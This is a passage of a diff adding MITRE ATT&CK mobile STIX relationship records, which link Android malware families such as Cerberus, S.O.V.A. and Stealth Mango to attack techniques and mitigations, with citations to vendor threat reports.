"target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--afba6b19-7486-4e5a-8fda-e91852b0b354", + "type": "relationship", + "created": "2021-09-20T13:42:21.104Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-09-27T18:05:43.107Z", + "description": "Users should be encouraged to be very careful with what applications they grant phone call-based permissions to. 
Further, users should not change their default call handler to applications they do not recognize.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a8c21a71-f3e9-43e9-9212-faf9181e70ce", + "created": "2022-04-01T18:42:50.381Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Providing user guidance around commonly abused features, such as the modal that requests for administrator permissions, should aid in preventing impairing defenses.", + "modified": "2022-04-01T18:42:50.381Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a2323d47-348c-4e3c-9c25-7feb20e2e457", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:03.638Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads contact lists for various third-party applications such as Yahoo, AIM, GoogleTalk, Skype, QQ, and others.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3c0b0763-78d2-4d6e-8e57-b4f27af7e414", + "created": "2019-10-18T14:50:57.521Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain fixes for vulnerabilities that could be leveraged to modify protected operating system files. 
", + "modified": "2022-03-30T20:08:17.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bb3be217-08e2-4bb0-9f1a-d8e538010451", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) gathers device model and operating system version information and transmits it to a command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffddcabb-0f03-46ae-abd6-7ab94e91b055", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": 
"Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-09-10T13:14:39.009Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) captures live recordings of the device's surroundings.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5c1e3aa9-160d-49fd-83a2-2ed2f8c5435c", + "type": "relationship", + "created": "2021-02-17T20:43:52.324Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." 
+ } + ], + "modified": "2021-02-17T20:43:52.324Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has collected phone metadata such as cell location, mobile country code (MCC), and mobile network code (MNC).(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0100020b-97d4-4657-bc71-c6a1774055a6", + "created": "2022-04-20T17:36:25.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:23.114Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has exfiltrated data via both SMTP and HTTP.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b19082d2-c151-45dd-8844-82335fbe3ed9", + "created": "2023-02-28T21:43:54.880Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:54.880Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can send text messages.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--789699c2-44f1-4280-bf86-ab23e6a13e84", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:18:51.813Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) uploads calendar events and reminders.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1d828f51-1c04-466c-beaf-2d4de741a544", + "created": "2020-05-04T14:04:56.184Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . 
Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:03:18.675Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) can access SMS messages in order to complete carrier billing fraud.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--806a9338-be20-4eef-aa54-067633ac0e58", + "type": "relationship", + "created": "2020-04-08T15:41:19.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:41:19.421Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can retrieve the device’s GPS location.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cfc30de-3e68-4361-a213-3c37ce27b70e", + "created": "2023-03-20T18:52:52.011Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:52.011Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4cc8a16f-562a-42c7-b5d9-10e1088af89c", + "created": "2019-09-03T20:08:00.687Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . 
Retrieved September 3, 2019.", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:31:38.319Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) can intercept two-factor authentication codes transmitted via SMS.(Citation: Talos Gustuff Apr 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f62e0aaf-e52f-40b9-a059-001f298a0660", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:19:00.168Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can be controlled via HTTP, XMPP, FirebaseCloudMessaging, or GoogleCloudMessaging in older versions.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60782df8-1e96-48eb-a6b7-843c94b32b59", + "created": "2023-02-06T19:43:17.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:33:52.290Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can hide its application icon.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4009ff40-4616-4b1c-bff9-599e52ccab37", + "created": "2020-01-27T17:05:58.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:34.373Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device’s contact list.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--386b0a9f-9951-4717-8bce-30c8fbe05050", + "type": "relationship", + "created": "2020-06-26T15:32:24.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:32:24.955Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) uses standard payload and string obfuscation techniques.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--27050442-e578-44b7-9534-ada78824befe", + "created": "2023-02-06T19:45:09.612Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:45:09.612Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can intercept and read SMS messages.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--68c17e9b-1fda-49dd-982b-566d473cc32b", + "created": "2022-04-06T15:51:11.939Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + 
"modified": "2022-04-06T15:51:11.939Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--633baf01-6de4-4963-bb54-ff6c6357bed3", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--48c0d9f7-9293-4f38-8ae5-9f5342621f74", + "type": "relationship", + "created": "2021-01-05T20:16:20.511Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021." + } + ], + "modified": "2021-01-05T20:16:20.511Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has contained an alarm that triggers every three minutes and timers for communicating with the C2.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bed52256-e5d2-4f15-8c4c-27f709e10c6c", + "type": "relationship", + "created": "2020-06-26T14:55:13.380Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. 
Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.380Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) dynamically loads its malicious functionality at runtime from an RC4-encrypted TTF file. [EventBot](https://attack.mitre.org/software/S0478) also utilizes ProGuard to obfuscate the generated APK file.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--33316f49-f1fb-453a-9ba7-d6889982a010", + "type": "relationship", + "created": "2020-07-20T13:27:33.459Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.516Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can obtain a list of installed applications.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a7336f2c-8f89-4d54-ac2b-77743afb2943", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-15T19:44:36.177Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) collects and uploads information about changes in SIM card or phone numbers on the device.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--383e5b12-061e-45c6-911b-b37187dd9254", + "type": "relationship", + "created": "2021-02-08T16:36:20.701Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": 
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.399Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included file enumeration in the malicious apps deployed as part of Operation BULL and Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1e29a9ce-ed11-44ae-b66e-8b90ee79de6a", + "created": "2020-06-26T15:32:24.962Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:04.769Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) hides its icon from the application drawer after being launched for the first time.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4c7e776d-ed19-4e5a-842c-81612f5c07bd", + "created": "2019-09-03T19:45:48.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
